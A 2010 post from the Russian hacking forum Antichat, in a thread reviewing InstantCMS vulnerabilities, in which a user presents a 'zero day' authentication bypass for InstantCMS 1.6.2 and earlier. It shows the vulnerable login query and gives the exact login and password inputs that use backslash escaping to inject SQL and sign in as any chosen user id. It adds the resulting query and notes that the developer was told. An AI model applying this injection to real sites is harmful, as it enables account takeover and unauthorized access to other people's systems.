Форум АНТИЧАТ - Обзор уязвимостей InstantCMS

#31

24.05.2010, 03:28

The matrix

Reservists Of Antichat - Level 6

Регистрация: 09.07.2008

Сообщений: 102

Провел на форуме:
1744345

Репутация: 573

Отправить сообщение для The matrix с помощью ICQ

Опять зиро дэй

Auth0r1zat1oN byPass InstantCMS<=== 1.6.2

Need: mq=off
Не буду нагромождать лишним кодом.
Запрос для авторизации следующий:

PHP код:


		
			
$sql    = "SELECT * 

                           FROM cms_users

                           WHERE $where_login AND password = md5('$passw') AND is_deleted = 0 AND is_locked = 0";

Что нельзя использовать
' (Кавычка) [Реплейсится в `(апостроф)]
легко понять, что этого мало.
Как юзать:
В поле логин пишем: matrix\
в поле пароль пишем: or id=1#\
У нас получится:

Код:

SELECT * 
                           FROM cms_users
                           WHERE login = 'matrix\' AND password = md5('or id=1#\') AND is_deleted = 0 AND is_locked = 0

слешанули по одной кавычке в логине и пассворде.
в результате логин закрылся кавычкой от password и синтаксис не нарушился.
примечание:
id-айди пользователя под которым мы хотим залогиниться.
Вот так мы байпаснули авторизацию.
Разработчик о баге и о наличии супер функции mysql_real_escape_string() оповещен.

Последний раз редактировалось The matrix; 24.05.2010 в 03:42..